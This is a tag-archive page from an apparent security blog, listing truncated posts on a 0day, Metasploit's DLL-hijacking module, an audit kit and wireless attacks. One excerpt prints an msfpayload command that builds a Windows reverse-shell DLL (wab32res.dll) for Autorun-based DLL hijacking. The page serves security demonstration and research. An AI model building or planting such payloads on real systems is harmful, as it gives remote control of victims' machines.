Posts Tagged ‘exploit’

I haven’t seen anyone do a writeup of an actual exploitation of this 0day yet, so I figured now would be a good time, since it’s getting so much publicity. It has just been announced that this is actively being exploited in the wild, which definitely makes it more serious than it was a day [...]

This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will. [BEGIN REGURGITATION [...]

I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome.

# msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.0.58

This is a quick video demonstrating the “webdav_dll_hijacker” Metasploit module. In this video, I target Windows Address Book (.vcf/wab32res.dll). (Best viewed in fullscreen mode in 480p or higher. YouTube absolutely killed the video quality. Thanks YouTube!) Just to make sure this is clear.. the window on the left side of the screen is my Linux [...]

HD Moore (Metasploit) has just released an update to his original DLLHiJackAuditKit which further automates the process of discovering programs which are vulnerable to this attack. You can find his post here. And here is the direct link to the zip file.

So, for those of you who do not follow the Metasploit project as closely as others, there was a new module included in the 10125 revision which came out on Monday. This module is kind of a huge deal, because it affects many, many Windows programs. I’ll demonstrate one in this post, but if you [...]

This came across on Full Disclosure. Here is the exploit in action along with the source code:

I want to start by saying that this document is not new. It’s floated around the internet for a while, but it’s still very, very relevant. It discusses various different wireless threats (802.11, Bluetooth, et al.) and some easily executed exploits to attack these protocols. I think anyone who reads my blog is already very, very [...]